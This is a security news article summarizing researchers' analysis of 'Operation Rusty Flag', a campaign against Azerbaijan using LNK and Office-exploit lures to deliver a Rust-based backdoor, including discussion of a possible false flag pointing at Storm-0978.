Rusty Flag Campaign Targets Azerbaijan with Rust-Based Malware

Written by Mitchell Langley

September 20, 2023

Rusty Flag Campaign Targets Azerbaijan with Rust-Based Malware

A series of targeted attacks centered in Azerbaijan has drawn the attention of experts. This campaign exhibits a distinct characteristic: the deployment of malware crafted in the Rust programming language.

Referred to as “Operation Rusty Flag” by the cybersecurity firm Deep Instinct, this initiative has yet to be associated with any known threat actor or group.

Security analysts Simon Kenin, Ron Ben Yizhak, and Mark Vaitzman, in their comprehensive analysis published last week, shed light on the operation’s multifaceted initial access strategies.

Of particular interest is the utilization of a modified document, previously linked to the Storm-0978 group, as a lure. This raises the intriguing possibility of a calculated “false flag” attempt by the attackers to divert attribution efforts.

Rusty Flag Campaign Targets Azerbaijan with Rust-Based Malware

The attack chain hinges on an LNK file, aptly named “1.KARABAKH.jpg.lnk,” serving as a launchpad to retrieve a second-stage payload, an MSI installer hosted on Dropbox.

The installer, in turn, deploys a Rust-based implant, accompanied by an XML file scheduled to execute the implant and a decoy image featuring watermarks resembling the symbol of the Azerbaijan Ministry of Defense.

An alternative infection vector involves a Microsoft Office document, titled “Overview_of_UWCs_UkraineInNATO_campaign.docx,” exploiting CVE-2017-11882, a long-standing memory corruption vulnerability in Microsoft Office’s Equation Editor. This exploitation leads to the invocation of a Dropbox URL housing a distinct MSI file, propagating a variant of the same Rust backdoor.

The use of the “Overview_of_UWCs_UkraineInNATO_campaign.docx” document is notable, as a similar filename was employed in recent cyberattacks targeting Ukraine by Storm-0978.

These earlier attacks exploited an Office remote code execution flaw (CVE-2023-36884), potentially suggesting a calculated attempt to attribute the current campaign to Storm-0978.

The Rust-based backdoor, masquerading as “WinDefenderHealth.exe,” possesses the capability to collect information from the compromised host and transmit it to a server controlled by the attacker.

The ultimate objectives of this campaign remain shrouded in uncertainty, with the possibility of it being a red team exercise not entirely ruled out.

As observed by the researchers, the use of Rust in malware development is on the rise. Current security products are encountering challenges in accurately detecting Rust-based malware, and the reverse engineering process is notably more intricate.

Related Articles

Stay Up to Date With The Latest News & Updates

Join Our Newsletter


Subscribe To Our Newsletter

Sign up to our weekly newsletter summarizing everything thats happened in data security, storage, and backup and disaster recovery

You have Successfully Subscribed!